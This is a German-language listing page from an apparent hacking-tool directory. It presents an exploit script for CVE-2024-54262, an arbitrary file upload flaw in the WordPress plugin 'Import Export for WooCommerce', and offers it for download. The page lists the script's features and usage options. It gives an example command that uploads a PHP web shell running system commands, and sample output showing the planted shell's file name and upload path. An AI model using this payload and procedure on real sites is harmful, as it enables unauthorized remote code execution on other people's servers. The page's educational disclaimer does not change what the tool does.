Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-54262 — Exploit CVE-2024-54262: Beliebiger Datei-Upload in Import Export für WooCommerce | Kitploit
Tools/GitHubGitHub/nxploited/cve-2024-54262
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubnxploited/cve-2024-54262

CVE-2024-54262

Exploit CVE-2024-54262: Beliebiger Datei-Upload in Import Export für WooCommerce

Repository anzeigen
5vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-54262

Exploit CVE-2024-54262: Beliebiger Datei-Upload in Import Export for WooCommerce

Übersicht

Dieses Skript nutzt eine Schwachstelle im WordPress-Plugin "Import Export for WooCommerce" aus. Die Schwachstelle erlaubt es nicht autorisierten Benutzern, beliebige Dateien hochzuladen, was zu potenzieller Remote-Code-Ausführung (RCE) führt.

Funktionen:

  • Versionserkennung: Prüft automatisch, ob die WordPress-Seite eine verwundbare Plugin-Version ausführt.
  • Authentifizierung: Unterstützt WordPress-Login für weitere Ausnutzung.
  • Datei-Upload: Ermöglicht das Hochladen bösartiger PHP-Dateien für RCE.

Voraussetzungen:

  1. Python 3.x
  2. Erforderliche Python-Bibliotheken:
    • requests
    • argparse

Installieren Sie die Abhängigkeiten mit:

pip install requests

3.Stellen Sie sicher, dass die Ziel-WordPress-Seite die verwundbare Version des Plugins verwendet.

Verwendung:

usage: CVE-2024-54262.py [-h] --url URL --username USERNAME --password PASSWORD [--command COMMAND]

Exploit CVE-2024-54262: Arbitrary File Upload in Import Export for WooCommerce

options:
  -h, --help            show this help message and exit
  --url URL, -u URL     Base URL of the WordPress site
  --username USERNAME, -un USERNAME
                        Username for login
  --password PASSWORD, -p PASSWORD
                        Password for login
  --command COMMAND, -c COMMAND
                        PHP shell code to upload

Beispiel:

 CVE-2024-54262.py --url https://example.com --username admin --password admin --command "<?php system('ls'); ?>"

Erklärung der Ausgabe

  1. Die Seite ist verwundbar.
    • Zeigt an, dass die WordPress-Seite eine verwundbare Plugin-Version ausführt.
  2. Erfolgreich angemeldet.
    • Bestätigt erfolgreiche Anmeldung mit den angegebenen Anmeldedaten.
  3. {
        "status": true,
        "code": 104,
        "message": "Success",
        "data": {
            "file_name": "import_manual_1737090262.php",
            "total_requests": 1,
            "import_columns": "all",
            "product_search_type": "SKU",
            "product_operation": "create_new_update_existing",
            "field_separator": ","
        }
    }
    
    
    
  • Shell-Name: import_manual_1737090262.php
  • Shell-Pfad: wp-content/uploads/import-export-for-woocommerce/product/

Haftungsausschluss

Dieses Tool dient nur zu Bildungszwecken. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Skript verursacht werden. Unbefugter Zugriff oder Ausnutzung von Systemen ohne ausdrückliche Erlaubnis ist illegal und unethisch.

Tool herunterladen